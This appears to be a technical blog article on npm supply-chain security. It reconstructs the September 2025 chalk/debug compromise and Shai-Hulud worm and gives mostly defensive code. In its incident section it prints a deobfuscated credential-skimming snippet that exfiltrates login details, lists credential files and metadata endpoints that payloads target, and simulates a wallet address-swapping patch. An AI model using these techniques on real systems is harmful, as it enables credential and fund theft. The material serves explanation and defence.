How the software supply chain actually works in modern development





Software development today is layered: your code depends on libraries, those libraries depend on other libraries, your CI system pulls everything in automatically, and the final bundle is shipped to users. In this structure, the software “supply chain” is not about physical parts but about the chain of trust that links source code, builds, artifacts, and distribution.

In crypto ecosystems, where user wallets, smart contracts, relayers, and bots all touch value, a breach at any link can lead to direct fund theft.

What follows is a technical narrative in three arcs: how the supply chain works under the hood, what supply-chain attacks do in detail, and a forensic reconstruction of the September 2025 npm incident based on published analyses. We close with lessons for teams that want to defend themselves.

I. The mechanics of software supply chains in development

When you build software, especially in modern JavaScript / Node / Web3 stacks, what you consume is not just your own source code but a forest of dependencies. These dependencies are fetched from package registries (npm, PyPI, etc.), resolved by version constraints, cached, and eventually bundled or deployed. The trust model is: you trust that what you pull is the code the maintainer intended, that it was built in a clean environment, and that nothing malicious was injected along the way.



Let’s go through a concrete scenario. You have a DApp frontend that depends on @wallet-sdk/core@1.x. That package depends on logger@2.x and format-utils@0.3.x, and format-utils in turn depends on ansi-styles, strip-ansi, supports-color, and so on. When you run npm install, the resolver picks a concrete version for each package (resolving semver ranges, or reading exact versions from the lockfile if one exists), then downloads each package's tarball from the npm registry. A tarball contains the package.json metadata, the source files, and any install scripts declared there (e.g. preinstall or postinstall). After unpacking, npm runs those lifecycle hooks by default unless scripts are disabled (for example with --ignore-scripts). In CI, these packages land in your build environment and are bundled, and the bundled output is deployed to servers or shipped to frontends.
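The resolution step is what lets a new release slip in unnoticed. Below is a simplified sketch of how a caret range such as "^5.0.0" (the prefix npm writes by default when saving a dependency) is matched against published versions, including the rule that for 0.x versions the caret only allows changes below the left-most non-zero component. `maxSatisfyingCaret` and its helpers are hypothetical: they handle only plain MAJOR.MINOR.PATCH versions and stand in for the real `semver` package, which also handles prereleases, tilde ranges, and other operators. The version lists are illustrative, not any package's actual release history.

```javascript
// Simplified caret-range resolution. Assumption: plain MAJOR.MINOR.PATCH versions only
// (no prerelease tags, no other range operators).
function parseVersion(version) {
  const parts = version.split(".").map(Number);
  if (parts.length !== 3 || parts.some((n) => !Number.isInteger(n) || n < 0)) {
    throw new Error(`unsupported version: ${version}`);
  }
  return parts;
}

// Negative if a < b, zero if equal, positive if a > b.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// Exclusive upper bound of "^x.y.z": bump the left-most non-zero component.
function caretUpperBound([major, minor, patch]) {
  if (major > 0) return [major + 1, 0, 0];
  if (minor > 0) return [0, minor + 1, 0];
  return [0, 0, patch + 1];
}

// Pick the highest published version inside the caret range, or null if none match.
function maxSatisfyingCaret(published, range) {
  if (!range.startsWith("^")) throw new Error(`only caret ranges are supported: ${range}`);
  const lower = parseVersion(range.slice(1));
  const upper = caretUpperBound(lower);
  let best = null;
  for (const v of published) {
    const p = parseVersion(v);
    const inRange = compareVersions(p, lower) >= 0 && compareVersions(p, upper) < 0;
    if (inRange && (best === null || compareVersions(p, parseVersion(best)) > 0)) best = v;
  }
  return best;
}

// Illustrative version lists: the same "^5.0.0" range resolves differently
// once a new patch release is published.
console.log(maxSatisfyingCaret(["5.4.1", "5.5.0", "5.6.0"], "^5.0.0")); // 5.6.0
console.log(maxSatisfyingCaret(["5.4.1", "5.5.0", "5.6.0", "5.6.1"], "^5.0.0")); // 5.6.1
console.log(maxSatisfyingCaret(["0.2.9", "0.3.0", "0.3.4", "0.4.0"], "^0.3.0")); // 0.3.4
```

A lockfile pins the resolved version, so the second case only affects installs that resolve ranges afresh (no lockfile, or a deliberate lockfile update).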

Critical points of interest

- Registry authenticity: the tarball you fetch must be signed or its hash verified.

- Package metadata: the package.json may include scripts that run automatically.

- Build environment integrity: the environment must be clean and not pre-compromised.

- Artifact provenance: the final artifact must be traceable back to the source tree and dependencies, and ideally reproducible.

- Deploy-time checks: verifying checksums, signatures, or SBOMs (Software Bill of Materials) at deploy time adds extra barriers to tampering.
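The registry-authenticity check is what the `integrity` field in npm's lockfile provides: an SRI-style string of the form `sha512-<base64 digest>` recorded when the package was first installed. A minimal sketch of verifying downloaded bytes against such a string with Node's built-in `crypto` module might look like this; `sriFor` and `verifyIntegrity` are hypothetical helpers, and the sketch assumes a single hash entry, whereas real SRI strings may list several.

```javascript
const crypto = require("node:crypto");

// Compute an SRI-style integrity string ("<algorithm>-<base64 digest>") for a buffer.
function sriFor(buffer, algorithm = "sha512") {
  const digest = crypto.createHash(algorithm).update(buffer).digest("base64");
  return `${algorithm}-${digest}`;
}

// Check downloaded bytes against the integrity string recorded in a lockfile.
// Assumption: a single "<algorithm>-<digest>" entry.
function verifyIntegrity(buffer, expected) {
  const dash = expected.indexOf("-");
  if (dash <= 0) throw new Error(`malformed integrity string: ${expected}`);
  const algorithm = expected.slice(0, dash);
  return sriFor(buffer, algorithm) === expected;
}

// Usage with an in-memory stand-in for a package tarball.
const tarball = Buffer.from("pretend this is package.tgz");
const recorded = sriFor(tarball); // what the lockfile stored at first install
console.log(verifyIntegrity(tarball, recorded)); // true
console.log(verifyIntegrity(Buffer.from("tampered bytes"), recorded)); // false
```

A matching hash only proves that the bytes are the ones recorded earlier. A malicious release published from a hijacked account has its own perfectly valid integrity value, so hashes protect against tampering in transit or in caches, not against a compromised publisher; that gap is what provenance attestations are meant to close.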



Because most projects don’t verify signatures or provenance deep into their transitive dependencies, a malicious update to ansi-styles or strip-ansi (low in the tree) can propagate invisibly upward. The more widely a package is reused (like chalk or debug), the more likely it is that any given Node.js project already depends on it, directly or transitively.
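Invisible upward propagation is a graph-reachability question: through which chains of dependencies does a given compromised package reach your application? The sketch below walks a dependency graph stored as a plain object (package name mapped to its direct dependency names). The graph reuses the hypothetical @wallet-sdk/core tree from the scenario above, with a "my-dapp" root and a strip-ansi to ansi-regex edge added for illustration; in practice you would build the graph from your lockfile or from the JSON output of `npm ls --all --json`.

```javascript
// Find every dependency path from `root` to `target` with a depth-first search.
// `graph` maps a package name to the names of its direct dependencies.
function pathsTo(graph, root, target) {
  const results = [];
  const walk = (node, path) => {
    if (path.includes(node)) return; // skip dependency cycles
    const next = [...path, node];
    if (node === target) {
      results.push(next);
      return;
    }
    for (const dep of graph[node] ?? []) walk(dep, next);
  };
  walk(root, []);
  return results;
}

// Hypothetical tree from the scenario above. "my-dapp" is the application, and the
// strip-ansi -> ansi-regex edge is added for illustration.
const graph = {
  "my-dapp": ["@wallet-sdk/core"],
  "@wallet-sdk/core": ["logger", "format-utils"],
  "logger": [],
  "format-utils": ["ansi-styles", "strip-ansi", "supports-color"],
  "strip-ansi": ["ansi-regex"],
};

for (const p of pathsTo(graph, "my-dapp", "ansi-regex")) console.log(p.join(" -> "));
// my-dapp -> @wallet-sdk/core -> format-utils -> strip-ansi -> ansi-regex
```

Enumerating every path can blow up on large, diamond-shaped trees; for a real lockfile it is usually enough to collect the set of ancestors of the compromised package instead.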

CI pipelines, token scopes, and credential exposure

The supply chain extends into CI / CD (Continuous Integration / Deployment). Developers push code, GitHub Actions (or Jenkins, CircleCI, etc.) fetch dependencies, run builds, run tests, and deploy artifacts. These pipelines often have credentials in environment variables: GitHub tokens (for commits / publishing), npm tokens (for publishing), cloud keys (to talk to AWS, GCP, etc.), database URIs, RPC keys, and so on.

A malicious dependency's postinstall script or runtime code could read environment variables, find an npm token, or exfiltrate GitHub secrets. If the dependency can reach GitHub APIs with a stolen token, it could push code, create pull requests, or even migrate repositories. A compromised GitHub token thus becomes a propagation vector: malicious package → CI environment → repositories → more package publishing rights.

Thus, your build systems are as much part of your trust boundary as your code, and a break in either can lead to compromise.
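One mitigation that follows from this is to give the dependency-install step as little as possible to steal. The sketch below filters the environment passed to an install step, dropping variables whose names look like credentials. The name pattern and the `scrubEnv` helper are assumptions for illustration: a name-based filter is not an exhaustive secret detector, will also drop some harmless variables, and does nothing about credential files on disk.

```javascript
// Name fragments that commonly indicate credentials (illustrative, not exhaustive).
const SECRET_NAME = /(TOKEN|SECRET|PASSWORD|PASSWD|PRIVATE_KEY|API_KEY|ACCESS_KEY|CREDENTIAL|AUTH)/i;

// Return a copy of `env` without secret-looking variables, plus the names removed.
function scrubEnv(env) {
  const clean = {};
  const removed = [];
  for (const [name, value] of Object.entries(env)) {
    if (SECRET_NAME.test(name)) {
      removed.push(name);
    } else {
      clean[name] = value;
    }
  }
  return { clean, removed };
}

const { clean, removed } = scrubEnv({
  PATH: "/usr/bin",
  NODE_ENV: "test",
  NPM_TOKEN: "npm_xxx",
  GITHUB_TOKEN: "ghp_xxx",
  AWS_SECRET_ACCESS_KEY: "xxx",
});
console.log(removed.join(", ")); // NPM_TOKEN, GITHUB_TOKEN, AWS_SECRET_ACCESS_KEY
console.log(Object.keys(clean).join(", ")); // PATH, NODE_ENV
// In CI, the clean environment would then be handed to the install step, e.g.
// require("node:child_process").spawnSync("npm", ["ci", "--ignore-scripts"], { env: clean, stdio: "inherit" });
```

If the install step itself needs a registry token (for private packages), that token should be scoped read-only and kept separate from publishing and cloud credentials.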

II. Anatomy of a supply-chain attack

To understand how attacks play out, let’s walk through a generic attack path step by step, and then we’ll map that to the actual incident.

Attack path

Recon / Target selection

The attacker enumerates high-impact targets: maintainers of popular packages or critical dependencies. They may monitor maintainers’ email, social media, or GitHub accounts for clues such as security lapses, missing MFA, or password reuse. They may also check which packages feed into crypto stacks, such as wallet connectors, CLI libraries, and relay services.





Initial compromise (account takeover)

A phishing email, spear-phishing, or other social engineering is used to bypass 2FA or obtain a session token. For instance, the attacker sends a fake “npm support: please verify your 2FA” email linking to a phishing site, then captures the password and OTP code or hijacks the session. Once inside, they can authenticate to npm as the maintainer and publish malicious versions. This is what happened to npm maintainer Qix in September 2025.
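A small defensive check aimed at this step: before trusting a link in an “npm support” email, confirm that its hostname really is an npm domain or a subdomain of one. The phishing mail in the Qix case was reportedly sent from the lookalike domain npmjs.help, which a check like this rejects. The `isTrustedLink` helper and its allowlist are assumptions for illustration; this does not replace phishing-resistant MFA such as WebAuthn security keys or passkeys, which will not authenticate to a lookalike site at all.

```javascript
// Domains treated as genuine for npm account links (illustrative allowlist).
const TRUSTED_DOMAINS = ["npmjs.com", "npmjs.org"];

// True if `link` uses HTTPS and its hostname is a trusted domain or a subdomain of one.
function isTrustedLink(link) {
  let url;
  try {
    url = new URL(link);
  } catch {
    return false; // not a parseable absolute URL
  }
  if (url.protocol !== "https:") return false;
  const host = url.hostname.toLowerCase();
  return TRUSTED_DOMAINS.some((d) => host === d || host.endsWith(`.${d}`));
}

console.log(isTrustedLink("https://www.npmjs.com/settings/profile")); // true
console.log(isTrustedLink("https://npmjs.help/verify-2fa")); // false (lookalike domain)
console.log(isTrustedLink("https://npmjs.com.evil.example/login")); // false (suffix trick)
```

Matching on the parsed hostname with an explicit leading dot avoids the classic mistakes of substring checks, which would accept both `npmjs.com.evil.example` and `evilnpmjs.com`.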

Malicious version publishing

Because the attacker now controls the publisher account, they bump the version in package.json and publish a new build containing an injected payload, often obfuscated (minified code, base64 chunks, dynamic eval) to hide its intent. The new versions are typically ordinary patch releases, which satisfy both caret (^) and tilde (~) ranges, so downstream installs and automated update tools accept them.

Payload execution on downstream installs / runtime

When users (or CI systems) install that version, the payload runs either through npm's install lifecycle hooks or, in frontends, as runtime code bundled into the app. The malware may:

- Inspect environment variables or local files (e.g., .npmrc, .git-credentials, .env, ~/.ssh/id_rsa) for secrets.

- Run a secret scanner like TruffleHog to search for leaked keys.

- Query cloud instance metadata endpoints (e.g. 169.254.169.254 on AWS) to fetch instance IAM credentials.

- Validate tokens (e.g. test whether a GitHub token has access) and, if so, use them to push new commits or workflows into repos.

- In browser / frontend contexts, hook Web3 APIs (window.ethereum) or monkey-patch functions to intercept or replace transaction recipient addresses, so that when a user signs, funds get sent to attacker addresses instead of intended ones.
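Because an install script runs with the permissions of the user who ran npm install, it can read whatever that user can read. A quick way to see what a malicious hook would find on a developer machine or CI runner is to check for the credential files named above. This sketch only reports which paths exist and never reads them; the file list mirrors the bullets above and is not exhaustive, and `exposedCredentialFiles` is a hypothetical helper.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

// Files commonly targeted by credential-stealing payloads (from the list above; not exhaustive).
const CANDIDATES = [".npmrc", ".git-credentials", ".env", path.join(".ssh", "id_rsa")];

// Return the candidate files that exist under any of `dirs`.
// Only existence is checked; file contents are never read.
function exposedCredentialFiles(dirs = [os.homedir(), process.cwd()]) {
  const found = [];
  for (const dir of new Set(dirs)) {
    for (const rel of CANDIDATES) {
      const full = path.join(dir, rel);
      if (fs.existsSync(full)) found.push(full);
    }
  }
  return found;
}

for (const file of exposedCredentialFiles()) {
  console.log(`present where an install script could look: ${file}`);
}
```

Anything this reports on a CI runner is a candidate for moving into a short-lived, narrowly scoped secret that is injected only into the step that needs it.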

III. Forensic Reconstruction: The 2025 npm crypto-targeted incident

Let’s now trace the timeline and technical observations from the September 2025 npm supply-chain breach, which specifically targeted crypto usage paths.

Timeline & scope

On September 8, 2025, a phishing attack compromised the npm account of Qix (Josh Junon). Within the first wave (~13:15 UTC), malicious versions of several core utility packages went live: ansi-styles@6.2.2, debug@4.4.2, chalk@5.6.1, supports-color@10.2.1, strip-ansi@7.1.1, ansi-regex@6.2.1, wrap-ansi@9.0.1, color-convert@3.1.1, color-name@2.0.1, is-arrayish@0.3.3, and slice-ansi@7.1.1. A second wave (~01:19–01:20 UTC) added simple-swizzle@0.2.3, supports-hyperlinks@4.1.1, chalk-template@1.1.1, and backslash@0.2.1, among others. Over the course of the day, additional versions of color-string, has-ansi, and proto-tinker-wc were also flagged.

These compromised packages had extremely high reach: cumulatively they account for billions of weekly downloads across the JavaScript ecosystem. The U.S. Cybersecurity & Infrastructure Security Agency (CISA) issued an alert on September 23, calling this a widespread supply-chain compromise, advising teams to review dependency trees and rotate credentials.

Later, security researchers identified a related campaign inside the npm ecosystem, labeled “Shai-Hulud”: a worm capable of self-propagation, credential harvesting, and repository takeover. Some reports counted over 100 compromised packages and others 187, well beyond the initial 18, and the worm could spread autonomously across maintainer accounts by abusing stolen npm tokens.

Payload, behavior, and technical mechanisms

Payload insertion & obfuscation. The malicious versions had injected code (often obfuscated/minified) that executed both on install and in runtime environments. Many of them contained postinstall or initialization hooks that triggered the malicious logic. Because these are low-level utility libs (ansi/strip-ansi/chalk etc.), their code is deeply reused; any code running in them can influence broad downstream modules.

Deobfuscated code:

```javascript
// When on the login page, intercept the login button click.
// `st`, `credentials`, and `geturl` are defined elsewhere in the payload (not shown).
if (st.includes("login")) {
  // Capture username and password from the form fields
  var username = document.querySelector("#login_username").value;
  var password = document.querySelector("#login_password").value;

  // Store credentials in localStorage AND send them to the attacker's server
  localStorage.setItem("user", username);
  localStorage.setItem("pass", password);
  geturl(credentials); // Exfiltration
}
```

Secret harvesting / reconnaissance. The payloads embedded tools like TruffleHog to search for GitHub tokens, AWS / cloud credentials, .npmrc credentials, .env files, SSH keys, and more. In addition, in environments with cloud metadata (e.g. EC2 instances), the worm attempted to query internal metadata endpoints to extract IAM role credentials. Once valid tokens were found, the worm could test repository access, push workflows, or exfiltrate data.

Worm propagation logic. What makes Shai-Hulud unusual (and maliciously powerful) is its self-replicating logic. When a compromised package ran and found npm tokens in the environment, it could automatically publish malicious versions of other packages under that maintainer’s control, propagating the infection “sideways”. It could also drop GitHub Actions workflows into repositories to harvest secrets when CI pipelines ran. In some cases, victims' private repositories were republished as public repositories labeled “Shai-Hulud Migration”, exposing their contents. The combination of self-publishing, secret harvesting, and repository control makes this attack more than a one-time payload: it becomes a spreading “parasite” in the ecosystem.

Crypto-targeted manipulations. For frontends, browsers, or Node.js contexts that interacted with Web3 APIs, the malicious code was built to intercept or monkey-patch Web3 / Ethereum APIs. For example, when application code invoked window.ethereum.request({method: "eth_sendTransaction", ...}) or web3.eth.sendTransaction(...), the payload could inspect the intended "to" address and replace it with an attacker address. Because the replacement happens before the user signs, the user signs a transaction they believe goes to recipient A while the actual destination is attacker-controlled. Cycode, Aikido, and the Black Duck summary all reported similar address-swapping logic in the payloads. Some versions also attempted to hijack clipboard operations or monitor DOM events to catch wallet URIs or QR codes. Because many JavaScript applications bundle everything together (utilities, logic, frontend code), even a component that is not itself a wallet library can end up on the path where the address swap executes.
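The swap only works if the payload can sit between the app building a transaction and the wallet receiving it. A defensive sketch, assuming an EIP-1193-style provider object with a `request({ method, params })` method (the interface `window.ethereum` exposes): capture `request` once at startup, refuse to send if it has since been replaced, check that the recipient still matches what the user confirmed in the app's UI, and call the captured function directly. `createGuardedSender` is a hypothetical helper and the provider below is a mock so the sketch runs in Node. Code that loads before the capture, or that patches lower-level functions, can still defeat it; the real backstop is the wallet's own confirmation screen, which the user has to actually read.

```javascript
// Build a sender that refuses to proceed if provider.request was swapped after startup
// or if the recipient no longer matches the address the user confirmed.
function createGuardedSender(provider) {
  const originalRequest = provider.request; // captured once, as early as possible
  return async function send(tx, confirmedTo) {
    if (provider.request !== originalRequest) {
      throw new Error("provider.request was replaced after startup; refusing to send");
    }
    if (tx.to.toLowerCase() !== confirmedTo.toLowerCase()) {
      throw new Error(`recipient ${tx.to} does not match confirmed ${confirmedTo}`);
    }
    // Call the captured function so a later monkey-patch cannot sit in between.
    return originalRequest.call(provider, { method: "eth_sendTransaction", params: [tx] });
  };
}

// Mock EIP-1193-style provider that echoes the recipient it received.
const provider = {
  async request({ method, params }) {
    return `${method} to ${params[0].to}`;
  },
};
const send = createGuardedSender(provider);
const alice = "0x1111111111111111111111111111111111111111";

// Simulated address-swapping patch of the kind described above ("0xATTACKER" is a placeholder).
const realRequest = provider.request;
provider.request = (args) =>
  realRequest.call(provider, { ...args, params: [{ ...args.params[0], to: "0xATTACKER" }] });

send({ to: alice, value: "0x0" }, alice).catch((err) => console.log(err.message));
// provider.request was replaced after startup; refusing to send
```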

Containment & response. Once anomaly detection teams and security researchers flagged suspicious behavior (e.g. telemetry and exfil patterns), npm and other registries began removing the malicious versions. Some users and downstream projects reacted by pinning to last known-good versions, rotating tokens, and issuing clean rebuilds. CISA’s advisory urged teams to rotate all developer credentials, audit dependency trees, and check cached artifacts. GitHub also responded by tightening token scopes, enhancing authentication for npm account connections, and enabling more granular permissions.

Why the attack succeeded and what saved it from being even worse:

High reuse of foundational packages. Because chalk, debug, strip-ansi, supports-color, etc. are so broadly depended upon, compromising them gives maximum reach. Many downstream applications pulled them in transitively without being aware of it.

Automated propagation (worm behavior). The ability to self-replicate across maintainer-controlled packages magnifies the attack scope. Once credentials were harvested, the payload could auto-push new versions and infect further.

Obfuscation and stealth. Payloads were likely minified, split across modules, using dynamic evaluation and string concatenation to foil easy static detection. They delayed or masked malicious calls, making initial detection harder.

Wide semver acceptance in downstream apps. Many projects declare caret ranges such as "^5.0.0", so any install that resolved versions afresh (no lockfile, or a lockfile update) picked up the malicious patch releases automatically.

Short reaction window. Because detection was somewhat rapid (security teams flagged suspicious changes), the actual on-chain theft from crypto frontends seems to have been limited. But the theoretical blast radius remained vast.
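Obfuscation makes static detection harder, but cheap heuristics still help triage a new release before it is trusted. The sketch below counts a few common obfuscation signals in a JavaScript source string: dynamic evaluation via `eval` or `new Function`, long base64-looking string literals, and dense `\x` hex escapes. The signal list, the 200-character and 20-escape thresholds, and the `obfuscationSignals` name are assumptions chosen for illustration. Legitimate minified code can trip them and a careful attacker can avoid them, so this is a prompt for human review of a version diff, not a detector.

```javascript
// Illustrative obfuscation signals; names and thresholds are assumptions, not a standard.
const SIGNALS = [
  { name: "eval call", pattern: /\beval\s*\(/g },
  { name: "Function constructor", pattern: /\bnew\s+Function\s*\(/g },
  { name: "long base64-like literal", pattern: /["'][A-Za-z0-9+\/]{200,}={0,2}["']/g },
  { name: "hex escape", pattern: /\\x[0-9a-fA-F]{2}/g },
];

// Count each signal in `source`; report those at or above their minimum count (default 1).
function obfuscationSignals(source, minCount = { "hex escape": 20 }) {
  const report = [];
  for (const { name, pattern } of SIGNALS) {
    const count = (source.match(pattern) ?? []).length;
    if (count >= (minCount[name] ?? 1)) report.push({ name, count });
  }
  return report;
}

const benign = 'module.exports = (s) => s.replace(/\\u001b\\[[0-9;]*m/g, "");';
const suspicious = `const p = "${"QUJD".repeat(60)}"; eval(atob(p));`;
console.log(obfuscationSignals(benign).length); // 0
console.log(obfuscationSignals(suspicious).map((s) => s.name).join(", "));
// eval call, long base64-like literal
```

Running this over only the files that changed between the previous and the new version of a dependency keeps the noise from existing minified code down.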

Final thoughts and conclusion

The 2025 npm compromise is a stark warning: even non-crypto “utility” packages can become a direct conduit to theft when your application handles financial flows. The chain of trust in software is fragile and interdependent, and the cryptoeconomy magnifies the consequences of breakages.

One key takeaway is that integrity must be verifiable. You can no longer assume that “latest semver release” is safe. You must have:

- Signed packages / provenance attestations (e.g. Sigstore, Cosign, metadata signing)

- SBOMs (Software Bill of Materials) that include full dependency chains

- CI policies that forbid unknown postinstall scripts, check artifact digests, and isolate secrets

- Token hygiene and least-privilege IAM across dev / CI / publishing

Users’ funds might vanish in a blink if a dependency you never even wrote becomes malicious. The only sane posture is least privilege, zero trust, defense in depth, and incident response.